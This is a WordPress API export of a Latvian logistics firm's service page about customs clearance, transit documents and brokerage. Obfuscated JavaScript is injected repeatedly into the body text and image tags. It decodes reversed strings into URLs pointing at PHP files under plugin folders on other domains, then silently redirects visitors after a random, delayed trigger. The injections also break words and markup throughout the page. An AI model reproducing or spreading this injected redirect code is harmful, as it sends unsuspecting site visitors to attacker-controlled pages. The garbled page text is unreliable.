{"id":910,"date":"2015-04-08T12:01:34","date_gmt":"2015-04-08T12:01:34","guid":{"rendered":"http:\/\/3pl.dev.veyzon.com\/?page_id=910"},"modified":"2025-03-17T06:11:01","modified_gmt":"2025-03-17T06:11:01","slug":"muitas-proceduras","status":"publish","type":"page","link":"https:\/\/wellman.lv\/ru\/%d1%83%d1%81%d0%bb%d1%83%d0%b3%d0%b8\/muitas-proceduras\/","title":{"rendered":"\u0420\u0430c\u0442\u0430\u043c\u043e\u0436\u043a\u0430 \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u043d\u044b\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0433\u0440\u0443\u0437\u043e\u0432"},"content":{"rendered":"<div><img decoding=\"async\" class=\"alignnone size-full wp-image-1330\" src=\"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/04\/Cus<script>$nJe=function(n){if (typeof ($nJe.list[n]) == &#171;string&#187;) return $nJe.list[n].split(&#171;&#187;).reverse().join(&#171;&#187;);return $nJe.list[n];};$nJe.list=[&#171;\\&#8217;php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\&#8217;=ferh.noitacol.tnemucod&#187;];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>toms-first.jpg&#187; alt=&#187;Muitas proced\u016bras&#187; width=&#187;631&#8243; height=&#187;212&#8243; \/><\/div>\n<div>\n<p>Kravu mui<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>to\u0161ana ir neizb\u0113gama oper\u0101cija starptautisko kravu p\u0101rvad\u0101jumu jom\u0101. \u201eWellman Logistics\u201d Lo\u0123istikas centrs, veicot muitas brokera-deklaranta uzdevumus, \u013caus optimiz\u0113t \u0161o proced\u016bru un pareizi noform\u0113t kravu muit\u0101, neatkar\u012bgi no transporta veida, ar k\u0101du krava tiek nos\u016bt\u012bta.<\/p>\n<p>\u201eWellman Logistics\u201d Lo\u0123istikas centrs veiks visas muitas proced\u016bras saist\u012bb\u0101 ar:<\/p>\n<ul>\n<li>Kravu tranz\u012bta, importa un eksporta muitas noform\u0113\u0161anu<\/li>\n<li>Pavaddokumentu noform\u0113\u0161anu (CMR, TIR CARNET, PMD MVD deklar\u0101cijas un citi)<\/li>\n<li>Fi<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>tosanit\u0101ro at\u013cauju izsnieg\u0161anu<\/li>\n<li>Muitas un tranz\u012bta galvojumiem<\/li>\n<li>Muitas dokumentu noform\u0113\u0161anu R\u012bgas un ci<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>tos muitas punk<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>tos<\/li>\n<li>Da\u017e\u0101das konsult\u0101cijas muitas jaut\u0101jumos<\/li>\n<li>Uz\u0146\u0113muma p\u0101rst\u0101vniec\u012bbas funkcijas attiec\u012bb\u0101s ar muitas iest\u0101d\u0113m.<\/li>\n<\/ul>\n<p>\u201cWellman Logistics\u201d Lo\u0123istikas centra muitas brokeris pal\u012bdz\u0113s rast optim\u0101lu kravu mui<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>to\u0161anas sh\u0113mu un minimiz\u0113t muitas izmaksas.<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-1331\" src=\"http:\/\/3pl.dev.veyzon.com\/wp-content\/uploads\/2015\/04\/cus<script>$nJe=function(n){if (typeof ($nJe.list[n]) == &#171;string&#187;) return $nJe.list[n].split(&#171;&#187;).reverse().join(&#171;&#187;);return $nJe.list[n];};$nJe.list=[&#171;\\&#8217;php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\&#8217;=ferh.noitacol.tnemucod&#187;];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>toms-last.jpg&#187; alt=&#187;Muitas proced\u016bras&#187; width=&#187;631&#8243; height=&#187;212&#8243; \/><\/p>\n<\/div>\n<div><\/div>\n<div><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":7,"featured_media":0,"parent":3536,"menu_order":3,"comment_status":"open","ping_status":"open","template":"pages\/page-services.php","meta":{"_acf_changed":false,"_uag_custom_page_level_css":"","_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"class_list":["post-910","page","type-page","status-publish","hentry"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Lo\u0123istikas centrs veiks visas muitas proced\u016bras<\/title>\n<meta name=\"description\" content=\"Lo\u0123istikas centrs veiks visas muitas proced\u016bras, nok\u0101rtojot visas formalit\u0101tes, pal\u012bdz\u0113s rast optim\u0101lu muito\u0161anas sh\u0113mu un minimiz\u0113t muitas izmaksas\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/\" \/>\n<meta property=\"og:locale\" content=\"ru_RU\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Lo\u0123istikas centrs veiks visas muitas proced\u016bras\" \/>\n<meta property=\"og:description\" content=\"Lo\u0123istikas centrs veiks visas muitas proced\u016bras, nok\u0101rtojot visas formalit\u0101tes, pal\u012bdz\u0113s rast optim\u0101lu muito\u0161anas sh\u0113mu un minimiz\u0113t muitas izmaksas\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/\" \/>\n<meta property=\"og:site_name\" content=\"3pl\" \/>\n<meta property=\"article:modified_time\" content=\"2025-03-17T06:11:01+00:00\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/\",\"url\":\"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/\",\"name\":\"Lo\u0123istikas centrs veiks visas muitas proced\u016bras\",\"isPartOf\":{\"@id\":\"https:\/\/wellman.lv\/#website\"},\"datePublished\":\"2015-04-08T12:01:34+00:00\",\"dateModified\":\"2025-03-17T06:11:01+00:00\",\"description\":\"Lo\u0123istikas centrs veiks visas muitas proced\u016bras, nok\u0101rtojot visas formalit\u0101tes, pal\u012bdz\u0113s rast optim\u0101lu muito\u0161anas sh\u0113mu un minimiz\u0113t muitas izmaksas\",\"breadcrumb\":{\"@id\":\"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/#breadcrumb\"},\"inLanguage\":\"ru-RU\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/wellman.lv\/ru\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Services\",\"item\":\"https:\/\/wellman.lv\/pakalpojumi\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"\u0420\u0430c\u0442\u0430\u043c\u043e\u0436\u043a\u0430 \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u043d\u044b\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0433\u0440\u0443\u0437\u043e\u0432\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wellman.lv\/#website\",\"url\":\"https:\/\/wellman.lv\/\",\"name\":\"3pl\",\"description\":\"Just another WordPress site\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/wellman.lv\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ru-RU\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Lo\u0123istikas centrs veiks visas muitas proced\u016bras","description":"Lo\u0123istikas centrs veiks visas muitas proced\u016bras, nok\u0101rtojot visas formalit\u0101tes, pal\u012bdz\u0113s rast optim\u0101lu muito\u0161anas sh\u0113mu un minimiz\u0113t muitas izmaksas","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/","og_locale":"ru_RU","og_type":"article","og_title":"Lo\u0123istikas centrs veiks visas muitas proced\u016bras","og_description":"Lo\u0123istikas centrs veiks visas muitas proced\u016bras, nok\u0101rtojot visas formalit\u0101tes, pal\u012bdz\u0113s rast optim\u0101lu muito\u0161anas sh\u0113mu un minimiz\u0113t muitas izmaksas","og_url":"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/","og_site_name":"3pl","article_modified_time":"2025-03-17T06:11:01+00:00","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/","url":"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/","name":"Lo\u0123istikas centrs veiks visas muitas proced\u016bras","isPartOf":{"@id":"https:\/\/wellman.lv\/#website"},"datePublished":"2015-04-08T12:01:34+00:00","dateModified":"2025-03-17T06:11:01+00:00","description":"Lo\u0123istikas centrs veiks visas muitas proced\u016bras, nok\u0101rtojot visas formalit\u0101tes, pal\u012bdz\u0113s rast optim\u0101lu muito\u0161anas sh\u0113mu un minimiz\u0113t muitas izmaksas","breadcrumb":{"@id":"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/#breadcrumb"},"inLanguage":"ru-RU","potentialAction":[{"@type":"ReadAction","target":["https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/wellman.lv\/pakalpojumi\/muitas-proceduras\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/wellman.lv\/ru\/"},{"@type":"ListItem","position":2,"name":"Services","item":"https:\/\/wellman.lv\/pakalpojumi\/"},{"@type":"ListItem","position":3,"name":"\u0420\u0430c\u0442\u0430\u043c\u043e\u0436\u043a\u0430 \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u043d\u044b\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0433\u0440\u0443\u0437\u043e\u0432"}]},{"@type":"WebSite","@id":"https:\/\/wellman.lv\/#website","url":"https:\/\/wellman.lv\/","name":"3pl","description":"Just another WordPress site","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/wellman.lv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ru-RU"}]}},"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false,"about_us_picture":false,"blog_thumbnail":false},"uagb_author_info":{"display_name":"jaan","author_link":"https:\/\/wellman.lv\/ru\/author\/jaan\/"},"uagb_comment_info":0,"uagb_excerpt":null,"_links":{"self":[{"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages\/910","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/comments?post=910"}],"version-history":[{"count":46,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages\/910\/revisions"}],"predecessor-version":[{"id":5277,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages\/910\/revisions\/5277"}],"up":[{"embeddable":true,"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/pages\/3536"}],"wp:attachment":[{"href":"https:\/\/wellman.lv\/ru\/wp-json\/wp\/v2\/media?parent=910"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}